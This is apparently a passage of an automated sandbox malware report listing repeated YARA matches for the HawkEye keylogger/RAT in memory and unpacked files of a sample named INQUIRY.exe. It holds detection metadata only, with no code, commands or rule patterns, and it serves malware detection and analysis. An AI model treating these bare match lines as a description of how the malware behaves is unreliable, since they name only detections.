                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE, Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
